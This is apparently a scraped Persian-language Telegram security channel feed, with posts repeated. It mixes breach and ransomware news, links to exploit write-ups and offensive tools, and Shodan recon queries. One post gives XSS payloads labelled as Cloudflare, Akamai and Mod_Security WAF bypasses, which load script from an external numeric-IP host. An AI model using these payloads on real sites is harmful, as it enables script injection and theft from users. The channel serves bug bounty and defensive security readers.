جلوگیری از اجرای موفقیت آمیز mimikatz در ویندوز
https://github.com/kamiarzand/MimikatzProtection
نکته:ابزار mimikatz برای سرقت توکن ها و پسوردهای کاربران در ویندوز بکار میرود.این ابزار قابلیت های دیگری نیز دارد
#windows
#privesc
#mimikatz
@sec_nerd
https://github.com/kamiarzand/MimikatzProtection
نکته:ابزار mimikatz برای سرقت توکن ها و پسوردهای کاربران در ویندوز بکار میرود.این ابزار قابلیت های دیگری نیز دارد
#windows
#privesc
#mimikatz
@sec_nerd
GitHub
GitHub - kamiarzand/MimikatzProtection: Here we say you how to protect your computer from the dangers of MIMIKATZ and lsass dump.
Here we say you how to protect your computer from the dangers of MIMIKATZ and lsass dump. - GitHub - kamiarzand/MimikatzProtection: Here we say you how to protect your computer from the dangers of ...
توضیحات فنی در خصوص آسیب پذیری شناسه CVE-2020-3952 که برای نفوذ به VCenter با مشکل افشای اطلاعات حساس در سرویس VMware Directory Service مورد استفاده قرار میگیرد
https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
#vmware
#exploit
@sec_nerd
https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
#vmware
#exploit
@sec_nerd
𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<img src=x onError=import('//1152848220/')>
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
#BugBounty
#xss
#waf
#cf
@sec_nerd
<img src=x onError=import('//1152848220/')>
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
#BugBounty
#xss
#waf
#cf
@sec_nerd
پلیس FBI اعلام کرد هکرهای دولتی بدنبال نفوذ به انستیتوهای علمی فعال در زمینه مبارزه با ویروس کرونا هستند.
طبق اعلام جانشین معاون FBI فعالیت هایی رصد شده اند که نشان میدهند هکرهای دولتی به دنبال نفوذ به مراکز علمی امریکا هستند که احتمالا علاقمند به دستیابی به منابع علمی و یافته های این انستیتوها می باشند.
https://www.forbes.com/sites/daveywinder/2020/04/17/fbi-says-foreign-states-hacked-into-us-covid-19-research-centers-report/#1f93eeda3c29
#news
#usa
#coronavirus
@sec_nerd
طبق اعلام جانشین معاون FBI فعالیت هایی رصد شده اند که نشان میدهند هکرهای دولتی به دنبال نفوذ به مراکز علمی امریکا هستند که احتمالا علاقمند به دستیابی به منابع علمی و یافته های این انستیتوها می باشند.
https://www.forbes.com/sites/daveywinder/2020/04/17/fbi-says-foreign-states-hacked-into-us-covid-19-research-centers-report/#1f93eeda3c29
#news
#usa
#coronavirus
@sec_nerd
Forbes
FBI Says Foreign States Hacked Into U.S. COVID-19 Research Centers: Report
FBI deputy assistant director confirms state-sponsored actors have hacked into COVID-19 research facilities.
دو نکته مربوط به جستجو در shodan:
۱- برای یافتن زیردامنه های یک شرکت با پسوندهای مختلف و نیز حذف مواردی که خطای ۴۰۱ دارند
ssl.cert.subject.cn:Starbucks.* -401
۲- برای حذف مواردی که عنوان صفحه یک عبارت خاص است
ssl.cert.subject.cn:Starbucks -title:" "
برای حذف هر نتیجه ی میتوانید از علامت - استفاده کنید
#shodan
#bubgountytips
#bugbounty
@sec_nerd
۱- برای یافتن زیردامنه های یک شرکت با پسوندهای مختلف و نیز حذف مواردی که خطای ۴۰۱ دارند
ssl.cert.subject.cn:Starbucks.* -401
۲- برای حذف مواردی که عنوان صفحه یک عبارت خاص است
ssl.cert.subject.cn:Starbucks -title:" "
برای حذف هر نتیجه ی میتوانید از علامت - استفاده کنید
#shodan
#bubgountytips
#bugbounty
@sec_nerd
امنیت اطلاعات
حملات باج افزاری و فیشینگ علیه زیرساختهای بهداشتی و مراکز علمی افزایش پیدا کرده اند. در گزارشی که شرکت Palo Alto Networks منتشر کرد اعلام شده است که در طی شیوع ویروس کرونا مجرمان سایبری حملات باج افزاری خود را به مراکزی که با این مسئله درگیر هستند افزایش…
هکرها ماه ها پس از انتشار آسیب پذیری مربوط به Pulse Secure VPN به اطلاعات اکتیودایرکتوری برخی بیمارستانهای امریکا دست یافته و باج افزارهای خود را در شبکه به اجرا گذاشته اند.
نزدیک به یکسال از انتشار اکسپلویت مربوط به سرورهای وی پی ان pulse secure میگذرد اما هنوز هم مواردی از سرورهای پچ نشده و آسیب پذیر در نقاط حساس دیده میشود.
https://www.bleepingcomputer.com/news/security/us-govt-hacker-used-stolen-ad-credentials-to-ransom-hospitals/
#pulse
#breach
#usa
#coronavirus
@sec_nerd
نزدیک به یکسال از انتشار اکسپلویت مربوط به سرورهای وی پی ان pulse secure میگذرد اما هنوز هم مواردی از سرورهای پچ نشده و آسیب پذیر در نقاط حساس دیده میشود.
https://www.bleepingcomputer.com/news/security/us-govt-hacker-used-stolen-ad-credentials-to-ransom-hospitals/
#pulse
#breach
#usa
#coronavirus
@sec_nerd
BleepingComputer
US govt: Hacker used stolen AD credentials to ransom hospitals
Hackers have deployed ransomware on the systems of U.S. hospitals and government entities using stolen Active Directory credentials months after exploiting a known remote code execution (RCE) vulnerability in their Pulse Secure VPN servers.
یک هکر ناشناس اطلاعات ۲۰ میلیون کاربر یک فروشگاه ثالث اپلیکیشن های اندروید با نام Aptoide را منتشر کرد!
این هکر ادعا میکند دیتای ۲۰ میلیونی بخشی از دیتای ۳۹ میلیونی اصلی است.
جزییاتی مانند ایمیل،پسوردهای هش شده،نام اصلی،مشخصات دستگاه و تاریخ تولد در این دیتابیس دیده میشود.
شایان ذکر است که پسوردهای هش شده از نوع sha1 و sha256 هستند که تا دقایقی قبل نزدیک به ۵ میلیون آن کرک شده است.
#breach
#news
#aptoide
@sec_nerd
این هکر ادعا میکند دیتای ۲۰ میلیونی بخشی از دیتای ۳۹ میلیونی اصلی است.
جزییاتی مانند ایمیل،پسوردهای هش شده،نام اصلی،مشخصات دستگاه و تاریخ تولد در این دیتابیس دیده میشود.
شایان ذکر است که پسوردهای هش شده از نوع sha1 و sha256 هستند که تا دقایقی قبل نزدیک به ۵ میلیون آن کرک شده است.
#breach
#news
#aptoide
@sec_nerd
آسیب پذیری بحرانی تبدیل CSRF به RCE در فروشگاه ساز پرستاشاپ نسخه 1.7.6.4
https://stazot.com/prestashop-csrf-to-rce-article/
#prestashop
#rce
#csrf
@sec_nerd
https://stazot.com/prestashop-csrf-to-rce-article/
#prestashop
#rce
#csrf
@sec_nerd
جعبه ابزار حمله به SQL server
https://github.com/NetSPI/PowerUpSQL
#sqlserver
#mssql
#windows
#pentest
@sec_nerd
https://github.com/NetSPI/PowerUpSQL
#sqlserver
#mssql
#windows
#pentest
@sec_nerd
امنیت اطلاعات
رایت آپی در خصوص نحوه ی نفوذ به حسابهای zoom https://medium.com/@s3c/how-i-hacked-worldwide-zoom-users-eafdff94077d #zoom #writeup @sec_nerd
ویدیو کنفرانس وزیر زنان آفریقای جنوبی که در پلتفرم zoom در حال اجرا بود توسط هکرها هایجک و برای لحظاتی تصاویر پورن بجای آن پخش شد!
افراد حاضر در این کنفرانس نیز بر این بارو بوده اند که مسئولان کنفرانس اثرات کرونا در حال پخش این تصاویر هستند.
https://www.hackread.com/minister-zoom-webinar-hijacked-display-porn/
#news
#zoom
@sec_nerd
افراد حاضر در این کنفرانس نیز بر این بارو بوده اند که مسئولان کنفرانس اثرات کرونا در حال پخش این تصاویر هستند.
https://www.hackread.com/minister-zoom-webinar-hijacked-display-porn/
#news
#zoom
@sec_nerd
HackRead
Govt minister’s Zoom webinar hijacked to display porn
Like us on Facebook @ /HackRead
The road from sandboxed SSTI to SSRF and XXE
https://www.reddit.com/r/Slackers/comments/g6pt8t/the_road_from_sandboxed_ssti_to_ssrf_and_xxe/
#ssti
#xxe
@sec_nerd
https://www.reddit.com/r/Slackers/comments/g6pt8t/the_road_from_sandboxed_ssti_to_ssrf_and_xxe/
#ssti
#xxe
@sec_nerd
رایت آپ استخراج اطلاعات کاربران از وبسایت tokopedia.com
https://santuysec.com/2020/02/11/tokopedia-bug-bounty-users-private-information-disclosure/
#writeup
#api
#pentest
#bugbounty
@sec_nerd
https://santuysec.com/2020/02/11/tokopedia-bug-bounty-users-private-information-disclosure/
#writeup
#api
#pentest
#bugbounty
@sec_nerd
مطالبی که در طی هفته اخیر منتشر شده و ارزش مطالعه دارند:
https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts/
https://mdsec.co.uk/2020/04/introducing-ysoserial-net-april-2020-improvements/
https://tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
#writeup
#pentest
@sec_nerd
https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts/
https://mdsec.co.uk/2020/04/introducing-ysoserial-net-april-2020-improvements/
https://tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
#writeup
#pentest
@sec_nerd
MDSec
Introducing YSoSerial.Net April 2020 Improvements - MDSec
The YSoSerial.Net project has become the most popular tool when researching or exploiting deserialisation issues in .NET. We have recently invested some research time to improve this tool to help ourselves and...
افزونه ی جدید burpsuite برای تشخیص آسیب پذیری هایی مانند SQLI و XSS بصورت خودکار
https://github.com/gauravnarwani97/Trishul
#burpsuite
#sqli
#xss
@sec_nerd
https://github.com/gauravnarwani97/Trishul
#burpsuite
#sqli
#xss
@sec_nerd
رایت آپ کشف آسیب پذیری RCE بر روی Open-AudIT
https://shells.systems/open-audit-v3-3-1-remote-command-execution-cve-2020-12078/
#writeup
#rce
@sec_nerd
https://shells.systems/open-audit-v3-3-1-remote-command-execution-cve-2020-12078/
#writeup
#rce
@sec_nerd
دزدیدن توکن های Microsoft TEAMS با استفاده از یک فایل GIF
https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/
#microsoft
#bugbounty
#jwt
@sec_nerd
https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/
#microsoft
#bugbounty
#jwt
@sec_nerd